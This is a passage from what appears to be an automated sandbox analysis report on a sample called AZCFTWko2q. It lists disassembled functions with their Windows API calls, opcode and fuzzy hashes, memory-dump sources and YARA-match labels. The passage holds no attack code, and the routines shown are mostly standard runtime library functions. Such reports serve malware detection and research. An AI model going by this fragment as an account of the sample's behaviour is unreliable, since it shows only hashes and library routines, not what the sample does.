                                                                                                                                                                                                                                                                                      • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                                                                      • Instruction ID: eb4735233013f534b63ada52e05664a4d822d9e8a6e3a35913ff8f234af06f75
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBF08C32A10300DFEB10EF69D801B4C77E1AF05722F10416AF900DB2A1C77589448F4A
                                                                                                                                                                                                                                                                                      Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                                                                      • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                                                                                                                                                                                                                                                      Function 024FB4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024FBCAB,024F0A1C,?,?,?,?,?,024F0A1C,?,?,?), ref: 024FB520
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                                                                                                                                                                                                      • Instruction ID: 68d32d313e7cd56293a75c5be2e7a9e757f88f82f08f61895820b11ee7e3ce6f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42F0553A30020857CB089F36DC0476BBF90EFC2754B0A005EEF098B290C3759842C790
                                                                                                                                                                                                                                                                                      Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                                                                                                                                                                                                      • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                                                                                                                                                                                                                                                      Function 024D08CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00410672,024CFE60), ref: 024D08D2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                                      • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                      Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                                      • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                      Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                                                                      • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                                                                                                                                                                                                                      Function 004373D9 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                                                                      • Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
                                                                                                                                                                                                                                                                                      Function 004071AB Relevance: .4, Instructions: 378COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                                                                                                                                                                                                      • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                                                                                                                                                                                                                                                      Function 024E76EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                                                                      • Instruction ID: f3b5f5190805b4698d63a461b06847c9acc7f3e95b14f595c6eda227b594814b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17D1B3721085A20AEF2D4A39847003BFFE26A521B730D479FD8F7CA6D2EF24D595D660
                                                                                                                                                                                                                                                                                      Function 024E7FCE Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                                      • Instruction ID: 997c4b69f28c37e50f38083dcda573743c3324b919311f64d1292b82a7231bc5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 739133722090A34AFF6E463E847413FFEE15A422A731A079FD4F3CA2D5EF248555DA20
                                                                                                                                                                                                                                                                                      Function 00427D67 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                                      • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                                                                                                                                                                                                                                                      Function 024E8289 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                                      • Instruction ID: 4a81a6b42763d70d4a8e310c9ec88c84ef7538502e54536037941173bfa84265
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8912F721090A34AFF69467A857413FFFE19A821A730A079FD4F3CA2E5FF248555D620
                                                                                                                                                                                                                                                                                      Function 00428022 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                                      • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
                                                                                                                                                                                                                                                                                      Function 024E7D07 Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                                      • Instruction ID: d1b306e79952ee1e1caadda0a87fa4a17f8ccbb8b3d07b36cd116e432cf8f8c1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8912E722090A34AFF6D463D857453EFEE19A412B730A079FE4F3CA2C5EF249665D620
                                                                                                                                                                                                                                                                                      Function 00427AA0 Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                                      • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                                                                                                                                                                                                                                                      Function 024ED755 Relevance: .2, Instructions: 237COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                                                                      • Instruction ID: 6fd82bfd921a4e0dfad55dc1dac07c35dcfbd6e2df2d00757058fac3d07aa892
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED613831E00B04DAFE386A2888517BF639EBF55A4BF04051BE8A3DB3C4D7159986C755
                                                                                                                                                                                                                                                                                      Function 0042D4EE Relevance: .2, Instructions: 237COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                                                                      • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                                                                                                                                                                                                                                                      Function 024E7A5D Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                                      • Instruction ID: 9fd99929694bf2e1927bac969fefa89163a4705cddffb1c4fd945dd3695034af
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2812C722090A34EFF69467A847413EFFE55A421B730A079FD4F3CA2C5EF2486A5D620
                                                                                                                                                                                                                                                                                      Function 004277F6 Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                                      • Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624
                                                                                                                                                                                                                                                                                      Function 024E87C7 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                                      • Instruction ID: 44d39b294b373855e9238f4a0498103ab3e5305471e12ef49ac131f11b0c1c86
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D11087720004247FE19862ED9B42BBE385FAC522AB2C577BD8634B778D322D145D600
                                                                                                                                                                                                                                                                                      Function 00428560 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
